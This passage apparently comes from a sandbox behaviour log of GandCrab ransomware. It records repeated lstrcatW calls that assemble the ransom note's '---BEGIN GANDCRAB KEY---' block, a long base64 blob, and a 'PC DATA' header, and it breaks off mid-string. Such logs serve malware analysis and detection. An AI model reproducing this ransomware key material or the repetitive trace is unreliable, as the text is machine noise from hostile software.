UIRr+7k/W9O9Vsy2Ncx5pf+S+MrL1Am5RQi3c6xFeTx3McZR80nVinhuYliRQhKNoNWI2gHaG6lRuz+QhG0RpMYbzBgOj5hi/ccyUyhM5fUIgcJ19lPdcmvixGlk5R8rk2ZfxhJxrFIuLQTsRraiwcDMTAm9c8kdr/Yf4Qn+bv7yJZ4YXgB8Edl1XdSnMrUPV5orcBx32esHl1bFHkes9Z9fwjFFx5B/Cryn6I0bTh6SxqxSMKfawlYjWRyp5yXtNibb+czxTwg05WEViDj2ZM5VFE5g9jVx1zLgL6rEoxvbP3/oWsr3rr58cqbE6IIH4k3tt4u7iqzfUkJmH+81vZbVzYHc6HQL/VLmt+Y7hRk6yorSj1pmiPFrXL99WrblAY6Nqyh2mx/jKDXMZzdlUQ2M5gjVl86lNCo37LDLVHUJd8suA7xHavGKMBzzx85p+J/UV9WPXnruEA=\r\n---END GANDCRAB KEY---\r\n", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n" [0067.317] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\nlAQAABBjXthJ5Q0wPDOiR/UUqBjqNGGRMSETfnKFN/wC0Z2y8uXNK/cQRxQ+uxjvHYoRNWKOwypfSnwisazfo2Iu5vWW+RCkGGB1GnesQkQwuT2AZxVx5QY4ie+leW/MZAwGPpz8/7dZwoL+UqqOwMpTG3+AnvEQ3LMnIiQcp4HDfd38MPRCsR6gqcIHoBpULwC3Gm7xztZBiHGZgZV7LnagQkrOAlwT16ipqL1zXT4kOyGEZLSlq6HRWrRJkYSQ5zLtP1Tk4hmmBQ1fojWFrcoT46xcvW+3S30nV0FCQYdj5hHfbPlbORZri4n+eUCIlF1tKxbEiQtJNtfft1vkY1bnxIdtEtWbINwlun/197gOrrIXJ+Ep7a1s4hAT2kEkm1HUN99FUMz+IsQEK5ADYm5JsBUacYlXRewwxNAUgkwTQ1ixWHch6LNfoFbx/Y0QglYGl76bLgljglPiar+FMmsJkHDxXFAdpVPMKT+Ppcn2g1ReomyZsAw30hNMyYCtyzYVmQzNVVwevMkpq3Dfv0vHeCjXc0qgr8HSxoWSlVBzULrGdwqzabYyorx2wb2lPqnCsL/YOtcriePbwsWYFZQGFc1JoqJJZ5JttJ51ELDRCNMDhtZvBfaIze9TZLRaCBi0MJhTW08tcfTobJvJ0M94VbQDv+NQ7nkxi5S38g2FrM8HufqqI4ZgLoqCtEZDgibtBwQzmw0U+d/fimMNWfwOU5e6wPNjPHZjsW8/4Hf0fgXAvB2+gkvRsuHSiuWS0Zxz/AB3NiGOdZPdxrqKqYIBOkK5GH6n91Qit/CfFfNChQYysYHiEU1mCJ/F/BmeJy7tA0UrbroLSfEtzSxc6NsTHAeemHnNw8mLVApRnhPB6s6iZfYkboDLE7drVDlRrfzboc1VnGvFfFBf+Z7k+WUvkkhcACZiKtlPbp54S/s+UsmNHjUNR6DxSI21uaEP2M0quWSeFJ8wva+n/lG5XuLxKMYSDHOa9ys41HiQzC3A3Rgs/xXOtfM1xkVMelZx9dglof34J4GaoE7Sd4uA2kyaLvWbDChU8ZFHH+LOCfVAZaH4UnBeHc7hp6CSj0Kws1h01FcXgtvjCnApjU7FrYSBCrwzSsXOUk6AC47AiViH/qEfB4Dsf3rNY8JDbQTDrsWzI9obqNSOFe/JOsdNNVlx9gQ1yWY8Ne3Q3vqb2aNglg5+mnfrOPbQJ3f6SHyRSchoDrJfz8Cixu9Sk98DYWfjnspu5Yd/PxGD2UObk0bheMxhRisBc9BczSOL+6tlebhBmTh8LFaVomK1S8uztshRVcOJhp7o+HV5dQT5wALSyL6gNRGnOj54XQ6u56H/pjc+TKlY0aWRv8vecYDRDHLUnEHABLFqJP6Xyd1HSW26KetjV7KnBIh9FZhgkadhqOWuUgfoSobr2aM7YOjgZRhDinYb1sTIIwbmcdoUEEbjLPz35/pDb3rK/jeSbCapCh3zCffHr1h9XYWL7oglK1Iy9SnPzrNtw5inn5gF/Tb22/dx4+2SaUHPxTypOykbfjrWzNyN4t8TpJmjdvm1Al8STSQsvvRU7ECaR7nL2AdBN6J2m5jmdxTZydwJPn61cpF9kqDw/tvLOLJCCzV2ZDH3OImVuing1l1ebceBSEjo6Ra6zgu1Mj2cX9WMw1Px0Sd2lMuwmQk406OIdLdUd4glqf0UHr8dfGJyfbaJELctV6g6+n5fDq6VQA0rxxtyvkCthmRLsTgfOoXe4G7h9iNuesoMr0Poa8kJZTVhf3wT/uuydMyUpclSIjq+fUIRr+7k/W9O9Vsy2Ncx5pf+S+MrL1Am5RQi3c6xFeTx3McZR80nVinhuYliRQhKNoNWI2gHaG6lRuz+QhG0RpMYbzBgOj5hi/ccyUyhM5fUIgcJ19lPdcmvixGlk5R8rk2ZfxhJxrFIuLQTsRraiwcDMTAm9c8kdr/Yf4Qn+bv7yJZ4YXgB8Edl1XdSnMrUPV5orcBx32esHl1bFHkes9Z9fwjFFx5B/Cryn6I0bTh6SxqxSMKfawlYjWRyp5yXtNibb+czxTwg05WEViDj2ZM5VFE5g9jVx1zLgL6rEoxvbP3/oWsr3rr58cqbE6IIH4k3tt4u7iqzfUkJmH+81vZbVzYHc6HQL/VLmt+Y7hRk6yorSj1pmiPFrXL99WrblAY6Nqyh2mx/jKDXMZzdlUQ2M5gjVl86lNCo37LDLVHUJd8suA7xHavGKMBzzx85p+J/UV9WPXnruEA=\r\n---END GANDCRAB KEY---\r\n\r\n", lpString2="---BEGIN PC DATA---" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---" [0067.318] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\nlAQAABBjXthJ5Q0wPDOiR/UUqBjqNGGRMSETfnKFN/wC0Z2y8uXNK/cQRxQ+uxjvHYoRNWKOwypfSnwisazfo2Iu5vWW+RCkGGB1GnesQkQwuT2AZxVx5QY4ie+leW/MZAwGPpz8/7dZwoL+UqqOwMpTG3+AnvEQ3LMnIiQcp4HDfd38MPRCsR6gqcIHoBpULwC3Gm7xztZBiHGZgZV7LnagQkrOAlwT16ipqL1zXT4kOyGEZLSlq6HRWrRJkYSQ5zLtP1Tk4hmmBQ1fojWFrcoT46xcvW+3S30nV0FCQYdj5hHfbPlbORZri4n+eUCIlF1tKxbEiQtJNtfft1vkY1bnxIdtEtWbINwlun/197gOrrIXJ+Ep7a1s4hAT2kEkm1HUN99FUMz+IsQEK5ADYm5JsBUacYlXRewwxNAUgkwTQ1ixWHch6LNfoFbx/Y0QglYGl76bLgljglPiar+FMmsJkHDxXFAdpVPMKT+Ppcn2g1ReomyZsAw30hNMyYCtyzYVmQzNVVwevMkpq3Dfv0vHeCjXc0qgr8HSxoWSlVBzULrGdwqzabYyorx2wb2lPqnCsL/YOtcriePbwsWYFZQGFc1JoqJJZ5JttJ51ELDRCNMDhtZvBfaIze9TZLRaCBi0MJhTW08tcfTobJvJ0M94VbQDv+NQ7nkxi5S38g2FrM8HufqqI4ZgLoqCtEZDgibtBwQzmw0U+d/fimMNWfwOU5e6wPNjPHZjsW8/4Hf0fgXAvB2+gkvRsuHSiuWS0Zxz/AB3NiGOdZPdxrqKqYIBOkK5GH6n91Qit/CfFfNChQYysYHiEU1mCJ/F/BmeJy7tA0UrbroLSfEtzSxc6NsTHAeemHnNw8mLVApRnhPB6s6iZfYkboDLE7drVDlRrfzboc1VnGvFfFBf+Z7k+WUvkkhcACZiKtlPbp54S/s+UsmNHjUNR6DxSI21uaEP2M0quWSeFJ8wva+n/lG5XuLxKMYSDHOa9ys41HiQzC3A3Rgs/xXOtfM1xkVMelZx9dglof34J4GaoE7Sd4uA2kyaLvWbDChU8ZFHH+LOCfVAZaH4UnBeHc7hp6CSj0Kws1h01FcXgtvjCnApjU7FrYSBCrwzSsXOUk6AC47AiViH/qEfB4Dsf3rNY8JDbQTDrsWzI9obqNSOFe/J